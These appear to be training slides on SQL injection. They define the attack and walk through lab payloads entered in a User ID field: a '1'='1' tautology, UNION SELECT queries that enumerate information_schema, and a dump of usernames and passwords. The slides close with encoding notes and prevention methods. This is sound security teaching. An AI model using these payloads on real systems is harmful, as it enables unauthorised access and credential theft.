SQL

Injection
3rd July, 2024 via Ms Teams
SQL Injection
Vulnerability that consists of an attacker interfering with the SQL queries
that an application makes to a database.

SQLi (Structured Query Language injection) is an attack where DBMS

commands are injected into a website to manipulate the backend
database.

This is often accomplished through the use of metacharacters (i.e.,

symbols with programmatic power) which are not being properly filtered
or escaped (i.e., reverted back to basic symbols without programmatic
power).
SQL Statements
The following is a partial table of common SQL commands used in SQLi
statements:

SQL Expression Description

ORDER BY Sort data in ascending or descending order.
UNION Combine the results of two or more SELECT statements.
SELECT Retrieve certain records from one or more tables.
UPDATE Modify records.
INSERT Create a record.
DELETE Delete a record.
DROP Delete an entire table, a view of a table, or other objects in
the database.
SQL Tips
In SQLi, the most important character is a single quote.

If we want to return DBMS details, we use the statement ' UNION SELECT @@version, NULL#

To test if you can exploit the server script through Boolean logic. Type the following into the User ID: field, and then select Submit.
1' or '1'='1

This is a typical initial SQLi method that uses logic to trick the target into revealing more information than
its programmers intended. The concept is, you are setting up an OR expression between a variable
condition (i.e., whether a User ID exists) and a tautology (i.e., a statement of truth (e.g., 1=1)). The
results of this statement will always be true regardless of whether the variable condition is true. This
results in a lack of context for the remainder of the script, which instead of returning a single entry as
intended, the script may return all entries.
SQL Tips
Type the following command into the User ID: field, then select Submit:

' UNION SELECT table_schema, table_name FROM information_schema.tables#

This SQLi expression is attempting to request two columns of data (i.e., table_schema,
table_name) from the default DMBS database information container of MySQL (i.e.,
information_schema.tables). The table_schema value will be the name of the database
(displayed on the First name: lines), and the table_name will be the name of a table within
the database (displayed on the Surname lines).
SQL Tips
You now need to discover the column names of the tables.
However, the fastest way to do that results in all columns from all tables being dumped at once.
Type the following command into the User ID: field, then select Submit:

' UNION SELECT table_name, column_name FROM information_schema.columns#

This SQLi expression is attempting to request two columns of data (i.e., table_name,
column_name) from the default DMBS table information container of MySQL (i.e.,
information_schema.columns). The table_name value will be the table's name (displayed on the
First name: lines), and the column_name will be the name of a column within the table (displayed
on the Surname lines).
SQL Tips
With knowledge of the available columns in a table, you can now attempt to retrieve the
data from those columns.
So, you decide to pull usernames and passwords from the users table. Type the following
command into the User ID: field, then select Submit:

' UNION SELECT user, password FROM users#

SQL Tips
You may need to consult a reference table to determine the characters being obfuscated by the log. Some recognition of percent
encoding will be necessary in order to interpret website log entries. Here is a partial reference table of commonly used percent
encodings related to SQLi:
Encoding Value
%20 (space)
%21 !
%22 "
%23 #
%27 '
%28 (
%29 )
%2b +
%2c ,
%2f /
%3a :
%3c <
%3d =
%3e >
%3f ?
%40 @
%5C \
When dealing with hex values, such as those used in percent encoding, the case of the hex letter is irrelevant. They can be
lowercase or uppercase without issue.
Preventing SQL Injection Attacks
Option 1 – Use of Prepared Statements
The construction of the SQL statement is performed in two steps:
• The application specifies the query’s structure with placeholders for each user
input
• The application specifies the content of each placeholder

Option 2: Use of Stored Procedures

• A stored procedure is a batch of statements grouped together and stored in the
database
• Not always safe from SQL injection, still need to be called in a parameterized way

Option 3: Whitelist Input Validation

• Defining what values are authorized. Everything else is considered unauthorized
• Useful for values that cannot be specified as parameter placeholders, such as the
table name.

Option 4: Escaping All User Supplied Input

• Should be only used as a last resort